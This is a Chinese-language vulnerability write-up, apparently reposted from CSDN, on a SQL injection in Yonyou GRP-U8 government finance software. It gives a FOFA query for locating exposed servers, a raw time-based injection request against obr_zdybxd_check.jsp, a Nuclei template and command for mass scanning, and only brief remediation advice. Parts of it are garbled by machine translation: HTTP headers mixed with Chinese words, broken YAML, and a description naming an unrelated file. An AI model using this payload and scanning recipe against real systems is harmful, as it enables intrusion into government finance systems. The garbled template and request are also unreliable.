【产品介绍】
用友GRP-U8R10行政内控管理软件是用友基于云计算技术,专注于国家电子政务推出的新一代产品,是我国行政财务领域最专业的政府财务管理软件。
【漏洞介绍】
用友GRP-U8 obr_zdybxd_check.jsp SQL注入。黑客可以利用该漏洞执行任意SQL语句,包括查询数据、下载数据、创建Web shell、执行系统命令、绕过登录限制等。
【资产测绘Query】
fofa语法:app=\’UFIDA-GRP-U8\’
【产品界面】
【漏洞复现】
【poc】
GET /u8qx/obr_zdybxd_check.jsp?mlid=1%27;WAITFOR%20DELAY%20%270:0:5%27– HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Apple Web K it/537.36(KHTML、Gecko 等)Chrome/118.0.0.0 Safari/537.36Connection: 关闭
【Nuclei-Poc】
id: yongyou-grp-u8-sql-injectioninfo:name: yongyou grp u8 sql注入author: xxxseverity: highdescription: 使用响应大小和状态代码检查CarCardInfo.aspx中的SQL注入漏洞。 Tags: sqlirequests:- raw3336 0- |-@timeout=5sGET /u8qx/obr_zdybxd_check.jsp ?mlid=1%27;WAITFOR%20DELAY%20%270:0:3%27– HTTP/1.1Host: {{主机名}}用户代理3336 0 Mozilla /5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML、Gecko 等) ) Chrome/118.0.0.0 Safari/537.36Connection: closematchers-condition: andmatchers:- type: dsldsl:- \’duration=3\’- _代码==200\’ 条件: 和
【验证】
.\\nuclei -l 1.txt -t 1.yaml
【修复建议】
1、请联系厂家维修。
2. 除必要外,禁止从公共网络访问本系统。
3. 配置白名单访问。
免责声明:本文所涉及的技术、想法和工具仅供安全学习和交流之用,不得用于任何非法或商业目的。如果您不使用,后果自负。所有进入都需要许可。
以上#UFIDA GRP相关内容来源仅供参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/92565.html
